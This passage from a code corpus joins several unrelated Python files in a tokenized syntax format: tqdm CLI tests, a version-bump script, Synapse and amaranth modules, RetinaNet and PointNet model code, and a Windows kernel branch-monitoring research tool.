['--update'])<line_sep>out,err=capsysbin.readouterr()<assert_stmt>norm(out)<eq>IN_DATA<assert_stmt>(str(N<floordiv>2<times>N)+"it").encode()<in>err "expected arithmetic sum formula"<line_sep># test integer --update_to main(sys.stderr ['--update-to'])<line_sep>out,err=capsysbin.readouterr()<assert_stmt>norm(out)<eq>IN_DATA<assert_stmt>(str(N-1)+"it").encode()<in>err<assert_stmt>(str(N)+"it").encode()<not><in>err<with_stmt>closing(BytesIO())<as>sys.stdin<block_start>sys.stdin.write(IN_DATA.replace(b'\n' b'D'))<line_sep># test integer --update --delim sys.stdin.seek(0)<line_sep>main(sys.stderr ['--update' '--delim' 'D'])<line_sep>out,err=capsysbin.readouterr()<assert_stmt>out<eq>IN_DATA.replace(b'\n' b'D')<assert_stmt>(str(N<floordiv>2<times>N)+"it").encode()<in>err "expected arithmetic sum"<line_sep># test integer --update_to --delim sys.stdin.seek(0)<line_sep>main(sys.stderr ['--update-to' '--delim' 'D'])<line_sep>out,err=capsysbin.readouterr()<assert_stmt>out<eq>IN_DATA.replace(b'\n' b'D')<assert_stmt>(str(N-1)+"it").encode()<in>err<assert_stmt>(str(N)+"it").encode()<not><in>err<block_end># test float --update_to sys.stdin=[(str(i/2.0)+'\n').encode()<for>i _range(N)]<line_sep>IN_DATA=b''.join(sys.stdin)<line_sep>main(sys.stderr ['--update-to'])<line_sep>out,err=capsysbin.readouterr()<assert_stmt>norm(out)<eq>IN_DATA<assert_stmt>(str((N-1)/2.0)+"it").encode()<in>err<assert_stmt>(str(N/2.0)+"it").encode()<not><in>err<block_end>@mark.slow@mark.skipif(IS_WIN reason="no manpages on windows")<def_stmt>test_manpath tmp_path<block_start>"""Test CLI --manpath"""<line_sep>man=tmp_path/"tqdm.1"<assert_stmt><not>man.exists()<with_stmt>raises(SystemExit)<block_start>main(argv=['--manpath' str(tmp_path)])<block_end><assert_stmt>man.is_file()<block_end>@mark.slow@mark.skipif(IS_WIN reason="no completion on windows")<def_stmt>test_comppath tmp_path<block_start>"""Test CLI --comppath"""<line_sep>man=tmp_path/"tqdm_completion.sh"<assert_stmt><not>man.exists()<with_stmt>raises(SystemExit)<block_start>main(argv=['--comppath' str(tmp_path)])<block_end><assert_stmt>man.is_file()<line_sep># check most important options appear script=man.read_text()<line_sep>opts={'--help' '--desc' '--total' '--leave' '--ncols' '--ascii' '--dynamic_ncols' '--position' '--bytes' '--nrows' '--delim' '--manpath' '--comppath'}<assert_stmt>all(args<in>script<for>args opts)<block_end>@restore_sys<def_stmt>test_exceptions 
capsysbin<block_start>"""Test CLI Exceptions"""<line_sep>N=123<line_sep>sys.stdin=[str(i)+'\n'<for>i _range(N)]<line_sep>IN_DATA=''.join(sys.stdin).encode()<with_stmt>raises(TqdmKeyError match="bad_arg_u_ment")<block_start>main(sys.stderr argv=['-ascii' '-unit_scale' '--bad_arg_u_ment' 'foo'])<block_end>out,_=capsysbin.readouterr()<assert_stmt>norm(out)<eq>IN_DATA<with_stmt>raises(TqdmTypeError match="invalid_bool_value")<block_start>main(sys.stderr argv=['-ascii' '-unit_scale' 'invalid_bool_value'])<block_end>out,_=capsysbin.readouterr()<assert_stmt>norm(out)<eq>IN_DATA<with_stmt>raises(TqdmTypeError match="invalid_int_value")<block_start>main(sys.stderr argv=['-ascii' '--total' 'invalid_int_value'])<block_end>out,_=capsysbin.readouterr()<assert_stmt>norm(out)<eq>IN_DATA<with_stmt>raises(TqdmKeyError match="Can only have one of --")<block_start>main(sys.stderr argv=['--update' '--update_to'])<block_end>out,_=capsysbin.readouterr()<assert_stmt>norm(out)<eq>IN_DATA<line_sep># test SystemExits <for_stmt>i ('-h' '--help' '-v' '--version')<block_start><with_stmt>raises(SystemExit)<block_start>main(argv=[i])<block_end><block_end><block_end>
<import_stmt>os<def_stmt>replace_version old_version new_version<block_start><if_stmt><not>isinstance(old_version tuple)<or><not>isinstance(new_version tuple)<block_start><raise>ValueError("`old_version` and `new_version` must be version tuples, e.g. (1, 2, 3)")<block_end>major,minor,micro=old_version[:3]<line_sep>old_version=f'{major}.{minor}.{micro}'<line_sep>major,minor,micro=new_version[:3]<line_sep>new_version=f'{major}.{minor}.{micro}'<line_sep>print(f"New version = {new_version}")<for_stmt>root,_,files os.walk('../caer')<block_start><for_stmt>file files<block_start><if_stmt>file.endswith(('.py' '.cpp' '.c' '.h' '.hpp'))<block_start><with_stmt>open(os.path.abspath(os.path.join(root file)) 'r')<as>f<block_start>new_text=f.read().replace('version '+old_version 'version '+new_version)<block_end><with_stmt>open(os.path.abspath(os.path.join(root file)) 'w')<as>f<block_start>print(os.path.abspath(os.path.join(root file)))<line_sep>f.write(new_text)<block_end><block_end><block_end><block_end><block_end>replace_version((1 8 0) (3 9 1))<line_sep>
<import_from_stmt>.version VersionViewSet DeployVersionViewSet<line_sep>__all__=["VersionViewSet" "DeployVersionViewSet"]<line_sep>
<import_stmt>warnings<import_from_stmt>.xilinx XilinxPlatform<line_sep>__all__=["XilinxSpartan3APlatform" "XilinxSpartan6Platform"]<line_sep>XilinxSpartan3APlatform=XilinxPlatform<line_sep>XilinxSpartan6Platform=XilinxPlatform<line_sep># TODO(amaranth-0.4): remove warnings.warn("instead of amaranth.vendor.xilinx_spartan_3_6.XilinxSpartan3APlatform and "<concat>".XilinxSpartan6Platform, use amaranth.vendor.xilinx.XilinxPlatform" DeprecationWarning stacklevel=2)<line_sep>
# Copyright 2018-2021 The Matrix.org Foundation C.I.C. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>logging<import_from_stmt>typing TYPE_CHECKING List Optional Tuple<import_from_stmt>synapse.api.errors SynapseError<import_from_stmt>synapse.handlers.room_member RoomMemberHandler<import_from_stmt>synapse.replication.http.membership ReplicationRemoteJoinRestServlet<as>ReplRemoteJoin ReplicationRemoteKnockRestServlet<as>ReplRemoteKnock ReplicationRemoteRejectInviteRestServlet<as>ReplRejectInvite ReplicationRemoteRescindKnockRestServlet<as>ReplRescindKnock ReplicationUserJoinedLeftRoomRestServlet<as>ReplJoinedLeft <import_from_stmt>synapse.types JsonDict Requester UserID<if_stmt>TYPE_CHECKING<block_start><import_from_stmt>synapse.server HomeServer<block_end>logger=logging.getLogger(__name__)<class_stmt>RoomMemberWorkerHandler(RoomMemberHandler)<block_start><def_stmt>__init__ self hs:"HomeServer"<block_start>super().__init__(hs)<line_sep>self._remote_join_client=ReplRemoteJoin.make_client(hs)<line_sep>self._remote_knock_client=ReplRemoteKnock.make_client(hs)<line_sep>self._remote_reject_client=ReplRejectInvite.make_client(hs)<line_sep>self._remote_rescind_client=ReplRescindKnock.make_client(hs)<line_sep>self._notify_change_client=ReplJoinedLeft.make_client(hs)<block_end><async_keyword><def_stmt>_remote_join self requester:Requester remote_room_hosts:List[str] room_id:str user:UserID content:dict <arrow>Tuple[str int]<block_start>"""Implements RoomMemberHandler._remote_join"""<if_stmt>len(remote_room_hosts)<eq>0<block_start><raise>SynapseError(404 "No known servers")<block_end>ret=<await>self._remote_join_client(requester=requester remote_room_hosts=remote_room_hosts room_id=room_id user_id=user.to_string() content=content )<line_sep><return>ret["event_id"] ret["stream_id"]<block_end><async_keyword><def_stmt>remote_reject_invite self invite_event_id:str txn_id:Optional[str] requester:Requester content:dict <arrow>Tuple[str int]<block_start>""" Rejects an out-of-band invite received from a remote user Implements RoomMemberHandler.remote_reject_invite """<line_sep>ret=<await>self._remote_reject_client(invite_event_id=invite_event_id txn_id=txn_id requester=requester content=content )<line_sep><return>ret["event_id"] ret["stream_id"]<block_end><async_keyword><def_stmt>remote_rescind_knock self knock_event_id:str txn_id:Optional[str] requester:Requester content:JsonDict <arrow>Tuple[str int]<block_start>""" Rescinds a local knock made on a remote room Args: knock_event_id: the knock event txn_id: optional transaction ID supplied by the client requester: user making the request, according to the access token content: additional content to include in the leave event. Normally an empty dict. 
Returns: A tuple containing (event_id, stream_id of the leave event) """<line_sep>ret=<await>self._remote_rescind_client(knock_event_id=knock_event_id txn_id=txn_id requester=requester content=content )<line_sep><return>ret["event_id"] ret["stream_id"]<block_end><async_keyword><def_stmt>remote_knock self remote_room_hosts:List[str] room_id:str user:UserID content:dict <arrow>Tuple[str int]<block_start>"""Sends a knock to a room. Implements RoomMemberHandler.remote_knock """<line_sep>ret=<await>self._remote_knock_client(remote_room_hosts=remote_room_hosts room_id=room_id user=user content=content )<line_sep><return>ret["event_id"] ret["stream_id"]<block_end><async_keyword><def_stmt>_user_left_room self target:UserID room_id:str<arrow><none><block_start>"""Implements RoomMemberHandler._user_left_room"""<line_sep><await>self._notify_change_client(user_id=target.to_string() room_id=room_id change="left")<block_end><async_keyword><def_stmt>forget self target:UserID room_id:str<arrow><none><block_start><raise>RuntimeError("Cannot forget rooms on workers.")<block_end><block_end>
# Copyright (c) 2021 PPViT Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>math<import_stmt>paddle<import_stmt>paddle.nn<as>nn<import_from_stmt>paddle.nn.initializer Normal Constant<import_from_stmt>retinanet_loss RetinaNetLoss<import_from_stmt>post_process RetinaNetPostProcess<import_from_stmt>det_utils.generator_utils AnchorGenerator<class_stmt>RetinaNetHead(nn.Layer)<block_start>''' The head used in RetinaNet for object classification and box regression. It has two subnets for the two tasks, with a common structure but separate parameters. '''<def_stmt>__init__ self config<block_start>''' Args: input_shape (List[ShapeSpec]): input shape. num_classes (int): number of classes. Used to label background proposals. num_anchors (int): number of generated anchors. conv_dims (List[int]): dimensions for each convolution layer. norm (str or callable): Normalization for conv layers except for the two output layers. See :func:`detectron2.layers.get_norm` for supported types. loss_func (class): the class is used to compute loss. prior_prob (float): Prior weight for computing bias. '''<line_sep>super(RetinaNetHead self).__init__()<line_sep>num_convs=config.RETINANET.NUM_CONVS<line_sep>input_channels=config.RETINANET.INPUT_CHANNELS<line_sep>norm=config.RETINANET.NORM<line_sep>prior_prob=config.RETINANET.PRIOR_PROB<line_sep>self.num_classes=config.RETINANET.NUM_CLASSES<line_sep>self.get_loss=RetinaNetLoss(focal_loss_alpha=config.RETINANET.FOCAL_LOSS_ALPHA focal_loss_gamma=config.RETINANET.FOCAL_LOSS_GAMMA smoothl1_loss_delta=config.RETINANET.SMOOTHL1_LOSS_DELTA positive_thresh=config.RETINANET.POSITIVE_THRESH negative_thresh=config.RETINANET.NEGATIVE_THRESH allow_low_quality=config.RETINANET.ALLOW_LOW_QUALITY num_classes=config.RETINANET.NUM_CLASSES weights=config.RETINANET.WEIGHTS)<line_sep>self.postprocess=RetinaNetPostProcess(score_threshold=config.RETINANET.SCORE_THRESH keep_top_k=config.RETINANET.KEEP_TOPK nms_top_k=config.RETINANET.NMS_TOPK nms_threshold=config.RETINANET.NMS_THRESH bbox_reg_weights=config.RETINANET.WEIGHTS)<line_sep>self.anchor_generator=AnchorGenerator(anchor_sizes=config.RETINANET.ANCHOR_SIZE aspect_ratios=config.RETINANET.ASPECT_RATIOS strides=config.RETINANET.STRIDES offset=config.RETINANET.OFFSET)<line_sep>num_anchors=self.anchor_generator.num_anchors<line_sep>conv_dims=[input_channels]<times>num_convs<line_sep>cls_net=[]<line_sep>reg_net=[]<for_stmt>in_channels,out_channels zip([input_channels]+list(conv_dims) conv_dims)<block_start>cls_net.append(nn.Conv2D(in_channels out_channels kernel_size=3 stride=1 padding=1 weight_attr=paddle.ParamAttr(initializer=Normal(mean=0. std=0.01))))<if_stmt>norm<eq>"bn"<block_start>cls_net.append(nn.BatchNorm2D(out_channels))<block_end>cls_net.append(nn.ReLU())<line_sep>reg_net.append(nn.Conv2D(in_channels out_channels kernel_size=3 stride=1 padding=1 weight_attr=paddle.ParamAttr(initializer=Normal(mean=0. 
std=0.01))))<if_stmt>norm<eq>"bn"<block_start>reg_net.append(nn.BatchNorm2D(out_channels))<block_end>reg_net.append(nn.ReLU())<block_end>self.cls_net=nn.Sequential(*cls_net)<line_sep>self.reg_net=nn.Sequential(*reg_net)<line_sep>bias_value=-math.log((1-prior_prob)/prior_prob)<line_sep>self.cls_score=nn.Conv2D(conv_dims[-1] num_anchors<times>self.num_classes kernel_size=3 stride=1 padding=1 weight_attr=paddle.ParamAttr(initializer=Normal(mean=0. std=0.01)) bias_attr=paddle.ParamAttr(initializer=Constant(bias_value)))<line_sep>self.bbox_pred=nn.Conv2D(conv_dims[-1] num_anchors<times>4 kernel_size=3 stride=1 padding=1 weight_attr=paddle.ParamAttr(initializer=Normal(mean=0. std=0.01)))<block_end><def_stmt>forward self feats inputs<block_start>''' Returns: loss_dict (dict) | pred_result(tensor), bbox_num(tensor): loss_dict: contains cls_losses and reg_losses. pred_result: the shape is [M, 6], M is the number of final preds, Each row has 6 values: [label, score, xmin, ymin, xmax, ymax] bbox_num: the shape is [N], N is the num of batch_size, bbox_num[i] means the i'th img have bbox_num[i] boxes. '''<line_sep>anchors=self.anchor_generator(feats)<line_sep>pred_scores=[]<line_sep>pred_boxes=[]<for_stmt>feat feats<block_start>pred_scores.append(self.cls_score(self.cls_net(feat)))<line_sep>pred_boxes.append(self.bbox_pred(self.reg_net(feat)))<block_end>pred_scores_list=[transpose_to_bs_hwa_k(s self.num_classes)<for>s pred_scores]<line_sep>pred_boxes_list=[transpose_to_bs_hwa_k(s 4)<for>s pred_boxes]<if_stmt>self.training<block_start>anchors=paddle.concat(anchors)<line_sep>loss_dict=self.get_loss(anchors [pred_scores_list pred_boxes_list] inputs)<line_sep><return>loss_dict<block_end><else_stmt><block_start>img_whwh=paddle.concat([inputs["imgs_shape"][: 1:2] inputs["imgs_shape"][: 0:1]] axis=-1)<line_sep>pred_result,bbox_num=self.postprocess(pred_scores_list pred_boxes_list anchors inputs["scale_factor_wh"] img_whwh)<line_sep><return>pred_result bbox_num<block_end><block_end><block_end><def_stmt>transpose_to_bs_hwa_k tensor k<block_start><assert_stmt>tensor.dim()<eq>4<line_sep>bs,_,h,w=tensor.shape<line_sep>tensor=tensor.reshape([bs -1 k h w])<line_sep>tensor=tensor.transpose([0 3 4 1 2])<line_sep><return>tensor.reshape([bs -1 k])<block_end>
# Copyright (c) 2020. <NAME>, <EMAIL> # Ref: https://github.com/fxia22/pointnet.pytorch/pointnet/model.py <import_stmt>torch torch.nn<as>nn numpy<as>np torch.nn.functional<as>F<import_from_stmt>torch.autograd Variable<def_stmt>feature_transform_regularizer trans<block_start>d=trans.size()[1]<line_sep>I=torch.eye(d)[<none> : :]<if_stmt>trans.is_cuda<block_start>I=I.cuda()<block_end>loss=torch.mean(torch.norm(torch.bmm(trans trans.transpose(2 1)-I) dim=(1 2)))<line_sep><return>loss<block_end># STN -> Spatial Transformer Network <class_stmt>STN3d(nn.Module)<block_start><def_stmt>__init__ self channel<block_start>super(STN3d self).__init__()<line_sep>self.conv1=nn.Conv1d(channel 64 1)# in-channel, out-channel, kernel size self.conv2=nn.Conv1d(64 128 1)<line_sep>self.conv3=nn.Conv1d(128 1024 1)<line_sep>self.fc1=nn.Linear(1024 512)<line_sep>self.fc2=nn.Linear(512 256)<line_sep>self.fc3=nn.Linear(256 9)<line_sep>self.relu=nn.ReLU()<line_sep>self.bn1=nn.BatchNorm1d(64)<line_sep>self.bn2=nn.BatchNorm1d(128)<line_sep>self.bn3=nn.BatchNorm1d(1024)<line_sep>self.bn4=nn.BatchNorm1d(512)<line_sep>self.bn5=nn.BatchNorm1d(256)<block_end><def_stmt>forward self x<block_start>B=x.size()[0]<line_sep>x=F.relu(self.bn1(self.conv1(x)))<line_sep>x=F.relu(self.bn2(self.conv2(x)))<line_sep>x=F.relu(self.bn3(self.conv3(x)))<line_sep>x=torch.max(x 2 keepdim=<false>)[0]# global descriptors x=F.relu(self.bn4(self.fc1(x)))<line_sep>x=F.relu(self.bn5(self.fc2(x)))<line_sep>x=self.fc3(x)<line_sep>iden=Variable(torch.from_numpy(np.eye(3).flatten().astype(np.float32))).view(1 9).repeat(B 1)<if_stmt>x.is_cuda<block_start>iden=iden.cuda()<block_end>x=x+iden<line_sep>x=x.view(-1 3 3)<line_sep><return>x<block_end><block_end><class_stmt>STNkd(nn.Module)<block_start><def_stmt>__init__ self k=64<block_start>super(STNkd self).__init__()<line_sep>self.conv1=nn.Conv1d(k 64 1)<line_sep>self.conv2=nn.Conv1d(64 128 1)<line_sep>self.conv3=nn.Conv1d(128 1024 1)<line_sep>self.fc1=nn.Linear(1024 512)<line_sep>self.fc2=nn.Linear(512 256)<line_sep>self.fc3=nn.Linear(256 k<times>k)<line_sep>self.relu=nn.ReLU()<line_sep>self.bn1=nn.BatchNorm1d(64)<line_sep>self.bn2=nn.BatchNorm1d(128)<line_sep>self.bn3=nn.BatchNorm1d(1024)<line_sep>self.bn4=nn.BatchNorm1d(512)<line_sep>self.bn5=nn.BatchNorm1d(256)<line_sep>self.k=k<block_end><def_stmt>forward self x<block_start>B=x.size()[0]<line_sep>x=F.relu(self.bn1(self.conv1(x)))<line_sep>x=F.relu(self.bn2(self.conv2(x)))<line_sep>x=F.relu(self.bn3(self.conv3(x)))<line_sep>x=torch.max(x 2 keepdim=<false>)[0]<line_sep>x=F.relu(self.bn4(self.fc1(x)))<line_sep>x=F.relu(self.bn5(self.fc2(x)))<line_sep>x=self.fc3(x)<line_sep>iden=Variable(torch.from_numpy(np.eye(self.k).flatten().astype(np.float32))).view(1 self.k<power>2).repeat(B 1)<if_stmt>x.is_cuda<block_start>iden=iden.cuda()<block_end>x=x+iden<line_sep>x=x.view(-1 self.k self.k)<line_sep><return>x<block_end><block_end><class_stmt>PointNetEncoder(nn.Module)<block_start><def_stmt>__init__ self global_feat=<true> feature_transform=<false> channel=3 detailed=<false># when input include normals, it <block_start>super(PointNetEncoder self).__init__()<line_sep>self.stn=STN3d(channel)# Batch * 3 * 3 self.conv1=nn.Conv1d(channel 64 1)<line_sep>self.conv2=nn.Conv1d(64 128 1)<line_sep>self.conv3=nn.Conv1d(128 1024 
1)<line_sep>self.bn1=nn.BatchNorm1d(64)<line_sep>self.bn2=nn.BatchNorm1d(128)<line_sep>self.bn3=nn.BatchNorm1d(1024)<line_sep>self.global_feat=global_feat<line_sep>self.feature_transform=feature_transform<if_stmt>self.feature_transform<block_start>self.fstn=STNkd(k=64)<block_end>self.detailed=detailed<block_end><def_stmt>forward self x<block_start>_,D,N=x.size()# Batch Size, Dimension of Point Features, Num of Points trans=self.stn(x)<line_sep>x=x.transpose(2 1)<if_stmt>D<g>3# pdb.set_trace() <block_start>x,feature=x.split([3 D-3] dim=2)<block_end>x=torch.bmm(x trans)<line_sep># feature = torch.bmm(feature, trans) # feature -> normals <if_stmt>D<g>3<block_start>x=torch.cat([x feature] dim=2)<block_end>x=x.transpose(2 1)<line_sep>out1=self.bn1(self.conv1(x))<line_sep>x=F.relu(out1)<if_stmt>self.feature_transform<block_start>trans_feat=self.fstn(x)<line_sep>x=x.transpose(2 1)<line_sep>x=torch.bmm(x trans_feat)<line_sep>x=x.transpose(2 1)<block_end><else_stmt><block_start>trans_feat=<none><block_end>pointfeat=x<line_sep>out2=self.bn2(self.conv2(x))<line_sep>x=F.relu(out2)<line_sep>out3=self.bn3(self.conv3(x))<line_sep># x = self.bn3(self.conv3(x)) x=torch.max(out3 2 keepdim=<false>)[0]<if_stmt>self.global_feat<block_start><return>x trans trans_feat<block_end><elif_stmt>self.detailed<block_start><return>out1 out2 out3 x<block_end><else_stmt># concatenate global and local feature together <block_start>x=x.view(-1 1024 1).repeat(1 1 N)<line_sep><return>torch.cat([x pointfeat] 1) trans trans_feat<block_end><block_end><block_end><class_stmt>PointNetPartSegEncoder(nn.Module)<block_start><def_stmt>__init__ self feature_transform=<true> channel=3<block_start>super(PointNetPartSegEncoder self).__init__()<line_sep>self.stn=STN3d(channel)<line_sep>self.conv1=nn.Conv1d(channel 64 1)<line_sep>self.conv2=nn.Conv1d(64 128 1)<line_sep>self.conv3=nn.Conv1d(128 128 1)<line_sep>self.conv4=nn.Conv1d(128 512 1)<line_sep>self.conv5=nn.Conv1d(512 2048 1)<line_sep>self.bn1=nn.BatchNorm1d(64)<line_sep>self.bn2=nn.BatchNorm1d(128)<line_sep>self.bn3=nn.BatchNorm1d(128)<line_sep>self.bn4=nn.BatchNorm1d(512)<line_sep>self.bn5=nn.BatchNorm1d(2048)<line_sep>self.feature_transform=feature_transform<if_stmt>self.feature_transform<block_start>self.fstn=STNkd(k=128)<block_end><block_end><def_stmt>forward self point_cloud label<block_start>B,D,N=point_cloud.size()<line_sep>trans=self.stn(point_cloud)<line_sep>point_cloud=point_cloud.transpose(2 1)<if_stmt>D<g>3<block_start>point_cloud,feature=point_cloud.split(3 dim=2)<block_end>point_cloud=torch.bmm(point_cloud trans)<if_stmt>D<g>3<block_start>point_cloud=torch.cat([point_cloud feature] dim=2)<block_end>point_cloud=point_cloud.transpose(2 1)<line_sep>out1=F.relu(self.bn1(self.conv1(point_cloud)))<line_sep>out2=F.relu(self.bn2(self.conv2(out1)))<line_sep>out3=F.relu(self.bn3(self.conv3(out2)))<if_stmt>self.feature_transform<block_start>trans_feat=self.fstn(out3)<line_sep>net_transformed=torch.bmm(out3.transpose(2 1) trans_feat)<line_sep>out3=net_transformed.transpose(2 1)<block_end>out4=F.relu(self.bn4(self.conv4(out3)))<line_sep>out5=self.bn5(self.conv5(out4))<line_sep>out_max=torch.max(out5 2 keepdim=<false>)[0]<line_sep>out_max=torch.cat([out_max label.squeeze(1)] 1)<line_sep>expand=out_max.view(-1 2048+16 1).repeat(1 1 N)<line_sep>concat=torch.cat([expand out1 out2 out3 out4 out5] 1)<if_stmt>self.feature_transform<block_start><return>concat trans_feat<block_end><return>concat<block_end><block_end><class_stmt>encoder(nn.Module)<block_start><def_stmt>__init__ self 
num_channel=3 **kwargs<block_start>super(encoder self).__init__()<line_sep>self.feat=PointNetEncoder(global_feat=<true> channel=num_channel)<block_end><def_stmt>forward self x<block_start>feat,_,_=self.feat(x)<line_sep><return>feat<block_end><block_end><class_stmt>detailed_encoder(nn.Module)<block_start><def_stmt>__init__ self num_channel=3 **kwargs<block_start>super(detailed_encoder self).__init__()<line_sep>self.feat=PointNetEncoder(global_feat=<false> channel=num_channel detailed=<true>)<block_end><def_stmt>forward self x<block_start>out1,out2,out3,x=self.feat(x)<line_sep><return>out1 out2 out3 x<block_end><block_end>
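# A hedged shape-check sketch for the plain `encoder` wrapper above: feed a
# random batch of point clouds through it and confirm the 1024-dim global
# descriptor. Batch size, point count and CPU execution are arbitrary choices
# for illustration; requires PyTorch.
import torch

if __name__ == "__main__":
    model = encoder(num_channel=3)
    model.eval()  # keep BatchNorm running stats untouched for the smoke test
    points = torch.rand(2, 3, 1024)  # (batch, xyz channels, num points)
    with torch.no_grad():
        feat = model(points)
    print(feat.shape)  # expected: torch.Size([2, 1024])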
# Kernel introspection module to enrich branch collected data # This code is part of BranchMonitoring framework # Written by: <NAME> - 2017 # Federal University of Parana (UFPR) <import_from_stmt>xml.etree.ElementTree ElementTree# Parse XML <import_stmt>subprocess# Run dump tools <import_stmt>win32file<as>w# Use windows API <import_stmt>time# Wait for data <import_stmt>signal# Interrupt endless loop # Monitoring class - retrieves branch data <class_stmt>Monitor()# class instantiation <block_start><def_stmt>__init__ self save=<none><block_start>self.save=save<line_sep>self.mods=<none># No introspection data at this point signal.signal(signal.SIGINT self.signal_handler)# Installing signal handler # debug print <if_stmt>__debug__<block_start>print("Starting Monitor")<block_end><block_end># open driver handle <def_stmt>__open_driver_handler self<block_start>self.hdevice=w.CreateFile("\\\\.\\BranchMonitor" 0x80000000|0x40000000 0 <none> 3 0x00000080 <none>)<block_end># close driver handle <def_stmt>__close_driver_handler self<block_start>w.CloseHandle(self.hdevice)<block_end># get branch data from driver handle <def_stmt>__get_branch_data self# read bytes and string itself <block_start>tam,string=w.ReadFile(self.hdevice 200 <none>)<line_sep># if no data, return <if_stmt>len(string)<eq>0<block_start><return><none><block_end># case having data <else_stmt># interpret string as hex address <block_start>branch=int(string[8:15][::-1].encode('hex') 16)<line_sep><return>branch<block_end><block_end># signal handler <def_stmt>signal_handler self signal frame<block_start>self.run=<false><block_end># get offset from a given function address # mod: module to look into # offset: offset to look for <def_stmt>offset_to_func self mod offset# get pointer to given module <block_start>funcs=self.exports[mod]<line_sep># default: no offset found last_offset=0<line_sep>last_fname="Unknown"<line_sep># search whole exported symbols <for_stmt>f funcs<block_start>name=f[0]# function name addr=f[1]# function offset rel_addr=f[2]# relative function offset # if we are looking for such offset <if_stmt>offset<eq>addr<or>offset<eq>rel_addr# immediately returns <block_start><return>name<block_end># in case of a jump inside a given function # consider the closest exported symbol <if_stmt>offset<g>addr<and>addr<g>last_offset<block_start>last_offset=addr<line_sep>last_fname=name<block_end><block_end># return "unknown" or the closest symbol <return>last_fname<block_end># identifies to which module a given address refers <def_stmt>addr_to_module self branch# consider only the meaningful bytes <block_start>branch=branch&0xFFFFFFFF<line_sep># look into all loaded modules <for_stmt>m self.mods<block_start>start_addr=mods[m][0]# lowest addr end_addr=mods[m][1]# highestaddr # if branch is inside <if_stmt>branch<ge>start_addr<and>branch<le>end_addr# if there are exported symbols, dig into it <block_start><if_stmt>(self.exports<is><not><none>)# return base_module+function_at_offset <block_start><return>m+"+"+self.offset_to_func(m branch-start_addr)<block_end># otherwise, return just the name <return>m<block_end><block_end># nothing found <return>"Unknown"<block_end># polling loop <def_stmt>loop self mods=<none> exports=<none> save=<false><block_start><if_stmt>save<block_start>log=open(self.save "w")<block_end># default definitions last=""<line_sep>self.mods=mods<line_sep>self.exports=exports<line_sep>self.run=<true><line_sep># debug print <if_stmt>__debug__<block_start>print("Starting looping")<block_end># open handler 
self.__open_driver_handler()<try_stmt># infinite loop <block_start><while_stmt>(self.run)# try to get a branch tuple <block_start>branch=self.__get_branch_data()<line_sep># check if got <if_stmt>branch<is><not><none># no introspection, just print <block_start><if_stmt>self.mods<is><none><block_start>print("%x"%branch)<block_end><else_stmt># if there's introspection data, dig into it <block_start>module_string=self.addr_to_module(branch)<line_sep># do not print repeated entries <if_stmt>module_string<ne>last<block_start>s="%x <%s>"%(branch module_string)<line_sep>print(s)<if_stmt>save<block_start>log.write(s+"\n")<block_end>last=module_string<block_end><block_end><block_end><else_stmt># no data, sleep <block_start>time.sleep(1)<block_end><block_end><block_end># signal received <finally_stmt># cleanup <block_start><if_stmt>save<block_start>log.close()<block_end>self.__close_driver_handler()<block_end><block_end><block_end># Dumper: the introspection class <class_stmt>Dumper()# instantiation <block_start><def_stmt>__init__ self# set parser configs <block_start>self.parse()<block_end># set parser configs <def_stmt>parse self# External tools are required # DriverView used to enumerate modules # DriverView binary path <block_start>self.drvview_path="driverview-x64\DriverView.exe"<line_sep># DriverView Output file self.drvview_output="driverview-x64\drv.xml"<line_sep># DllView used to map function to offsets # DllView binary path self.dllview_path="dllexp-x64\dllexp.exe"<line_sep># DllView output self.dllview_output="Downloads\dllexp-x64\dll.xml"<block_end># enumerate loaded modules <def_stmt>dump_modules self<block_start><if_stmt>__debug__<block_start>print("Dumping Modules")<block_end># using DriverView s=subprocess.Popen([self.drvview_path "/sxml" self.drvview_output])<line_sep>s.wait()<block_end># get offsets <def_stmt>dump_exports self bin# using DllView <block_start>s=subprocess.Popen([self.dllview_path "/from_files" bin "/sxml" self.dllview_output])<line_sep>s.wait()<block_end># parse exported symbols <def_stmt>parse_exports self<block_start>exp=[]<line_sep>self.dtree=ElementTree()<line_sep>self.dtree.parse(self.dllview_output)<for_stmt>p self.dtree.findall("item")# get function name <block_start>fname=p.find('function_name').text<line_sep># try to get address <try_stmt># address <block_start>addr=int(p.find('address').text 16)<block_end><except_stmt># error, no meaningful address <block_start>addr=0xFFFFFFFF<block_end># also get relative addr rel_addr=int(p.find('relative_address').text 16)<line_sep># add tuple to list exp.append((fname addr rel_addr))<block_end># return list <return>exp<block_end># get offsets and parse <def_stmt>get_exports self bin<block_start><if_stmt>__debug__<block_start>print("Getting Exports for: %s"%bin)<block_end>self.dump_exports(bin)<line_sep><return>self.parse_exports()<block_end># parse loaded modules/drivers <def_stmt>parse_modules self<block_start>mods=dict()<line_sep>exports=dict()<line_sep>self.dtree=ElementTree()<line_sep>self.dtree.parse(self.drvview_output)<for_stmt>p self.dtree.findall("item")# module name <block_start>mod_name=p.find('driver_name').text<line_sep># initial addr mod_addr=int(p.find('address').text.replace("`" "") 16)<line_sep># end addr mod_end_addr=int(p.find('end_address').text.replace("`" "") 16)<line_sep># add to dict - no repeated modules mods[mod_name]=(mod_addr mod_end_addr)<line_sep># try to get exports for the module # returns a list exp=self.get_exports(p.find('filename').text)<line_sep># map module to export list 
exports[mod_name]=exp<block_end># return module dict and exports dict <return>mods exports<block_end><block_end># "main" <if_stmt>__name__<eq>'__main__'# introspect first <block_start>d=Dumper()<line_sep>d.dump_modules()<line_sep>mods,exports=d.parse_modules()<line_sep># then monitor m=Monitor(save="save.log")<line_sep># infinite loop # introspected data as parameter to the monitor m.loop(mods exports <true>)<block_end># no module import <else_stmt><block_start>print("No module import support yet!")<block_end>
